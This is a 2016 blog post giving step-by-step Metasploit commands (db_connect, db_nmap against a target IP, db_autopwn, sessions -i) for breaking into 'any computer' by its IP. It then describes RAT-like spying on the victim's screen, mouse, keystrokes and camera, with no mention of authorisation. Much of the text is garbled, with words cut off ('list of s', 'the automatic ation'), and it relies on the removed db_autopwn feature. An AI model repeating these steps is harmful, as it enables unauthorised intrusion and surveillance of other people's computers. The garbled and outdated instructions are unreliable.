Wednesday, May 25, 2016

Any Computer With IP



any computer with an ip (MetaSploit)
I am here to show you this magical tool called metasploit that allows you to anyun computer with only its IP .Lets begin

1) First you need to download metaSploit . The most up-to-date version is free at metasploit.com
2) you need Postgrsql for your database . Download from this link,
Download
Make sure you use all the defaults or metasploit woun't work!

3) now lets go down to business... After installing both tools, open up the PostgrSQL admin gui (start -> all
programs -> PostgreSQL 9.0 -> pgadmin III). then right-click on your server (in the left hand box) and click connect . Remember to keep this window open the whole time. you will also need the pass you chose to use in step 5...

4) time for some ! Go to start -> all programs -> Metasploit framework , and then open the metasploit gui. Let it load untill it look like this:

5) Now , in the window type:
db_connect postgres: ThePassyouChose@localhost : 5432
The first time you do this you will see lots of text flash buy. Don't wory. this is normal.

6) Type db_host to make sure you are connect correctallly.
7) Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to in the place of 000.000.000.000...

8) Now we get to the fun part; the automatic ation , Just type db_autopwn -t -p -e -s -b , watch the auto-ation start, go play halo for a while, andthen come back...

9) After th ation is done, type sessions -1 to see what the scanner found. If all went, you should see a list of s.
10) Now we get to use the s to the computer!!! if you will notice, all of the s are ed , and they all have obvious names (i.e. , reverseScreen_tcp). In order to use an , type this:
sessions-i

The ftures of Metasploit are much like a rat. once you get into someone's computer , you can see their screen, controll their mouse, see what they type , see them, etc,,,,,,

No comments:

Post a Comment